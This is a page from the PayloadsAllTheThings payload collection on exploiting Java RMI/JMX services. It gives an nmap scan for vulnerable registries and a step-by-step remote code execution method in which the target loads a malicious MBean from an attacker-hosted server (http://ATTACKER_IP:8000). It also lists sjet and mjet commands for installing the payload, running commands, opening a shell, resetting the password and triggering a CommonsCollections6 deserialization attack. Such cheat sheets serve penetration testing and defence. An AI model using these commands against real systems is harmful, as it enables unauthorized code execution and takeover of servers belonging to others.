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PayloadsAllTheThings/Java RMI
2021-12-13 20:42:31 +01:00
README.md samAccountName spoofing + Java RMI 2021-12-13 20:42:31 +01:00

Java RMI

The attacker can host a MLet file and instruct the JMX service to load MBeans from the remote host.




  • Jython
  • The JMX server can connect to a http service that is controlled by the attacker
  • JMX authentication is not enabled


$ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v
1089/tcp open  java-rmi Java RMI
| rmi-vuln-classloader:
|   RMI registry default configuration remote code execution vulnerability
|     State: VULNERABLE
|       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
| rmi-dumpregistry:
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub

Remote Command Execution

The attack involves the following steps:

  • Starting a web server that hosts the MLet and a JAR file with the malicious MBeans
  • Creating a instance of the MBean javax.management.loading.MLet on the target server, using JMX
  • Invoking the "getMBeansFromURL" method of the MBean instance, passing the webserver URL as parameter. The JMX service will connect to the http server and parse the MLet file.
  • The JMX service downloads and loades the JAR files that were referenced in the MLet file, making the malicious MBean available over JMX.
  • The attacker finally invokes methods from the malicious MBean.

Exploit the JMX using sjet or mjet

jython sjet.py TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000
jython sjet.py TARGET_IP TARGET_PORT super_secret command "ls -la"
jython sjet.py TARGET_IP TARGET_PORT super_secret shell
jython sjet.py TARGET_IP TARGET_PORT super_secret password this-is-the-new-password
jython sjet.py TARGET_IP TARGET_PORT super_secret uninstall
jython mjet.py --jmxrole admin --jmxpassword adminpassword TARGET_IP TARGET_PORT deserialize CommonsCollections6 "touch /tmp/xxx"

jython mjet.py TARGET_IP TARGET_PORT install super_secret http://ATTACKER_IP:8000 8000
jython mjet.py TARGET_IP TARGET_PORT command super_secret "whoami"
jython mjet.py TARGET_IP TARGET_PORT command super_secret shell
